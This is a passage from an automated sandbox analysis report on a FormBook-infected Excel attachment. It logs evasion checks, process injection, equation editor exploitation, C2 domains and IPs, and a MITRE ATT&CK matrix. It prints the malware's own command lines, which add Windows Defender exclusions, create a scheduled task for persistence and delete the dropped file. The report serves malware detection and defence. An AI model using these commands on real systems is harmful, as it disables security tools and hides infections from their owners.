          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Refno.191938.xlsxStream path 'EncryptedPackage' entropy: 7.99921088827 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2540Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2776Thread sleep time: -101794s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2476Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2904Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 884Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1552Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_01E2096A GetSystemInfo,
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 101794
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: powershell.exe, 00000007.00000003.2140373005.00000000002B1000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FA00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FA0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 43.226.23.112 80
          Source: C:\Windows\explorer.exeDomain query: www.pistonpounder.com
          Source: C:\Windows\explorer.exeDomain query: www.20svip.com
          .NET source code references suspicious native API functionsShow sources
          Source: ohms[1].exe.2.dr, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: ohms[1].exe.2.dr, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.4.dr, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.4.dr, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 4.2.vbc.exe.a00000.3.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 4.2.vbc.exe.a00000.3.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 4.0.vbc.exe.a00000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 4.0.vbc.exe.a00000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 13.0.vbc.exe.a00000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 13.0.vbc.exe.a00000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 340000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools21Credential API Hooking1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection611Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information41Security Account ManagerSecurity Software Discovery221SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsScheduled Task/Job1Network Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection611Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404009 Sample: Refno.191938.xlsx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 50 www.streamxvid.com 2->50 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 17 other signatures 2->68 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 38 21 2->16         started        signatures3 process4 dnsIp5 52 198.23.213.57, 49165, 80 AS-COLOCROSSINGUS United States 11->52 44 C:\Users\user\AppData\Local\...\ohms[1].exe, PE32 11->44 dropped 46 C:\Users\Public\vbc.exe, PE32 11->46 dropped 92 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->92 18 vbc.exe 3 11->18         started        48 C:\Users\user\Desktop\~$Refno.191938.xlsx, data 16->48 dropped file6 signatures7 process8 file9 40 C:\Users\user\AppData\...\zFVxYeAVOjnwuB.exe, PE32 18->40 dropped 42 C:\Users\user\AppData\Local\...\tmp4D08.tmp, XML 18->42 dropped 70 Machine Learning detection for dropped file 18->70 72 Uses schtasks.exe or at.exe to add and modify task schedules 18->72 74 Adds a directory exclusion to Windows Defender 18->74 76 2 other signatures 18->76 22 vbc.exe 18->22         started        25 powershell.exe 7 18->25         started        27 powershell.exe 6 18->27         started        29 2 other processes 18->29 signatures10 process11 signatures12 84 Modifies the context of a thread in another process (thread injection) 22->84 86 Maps a DLL or memory area into another process 22->86 88 Sample uses process hollowing technique 22->88 90 Queues an APC in another process (thread injection) 22->90 31 explorer.exe 22->31 injected process13 dnsIp14 54 20svip.com 43.226.23.112, 49166, 80 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong Hong 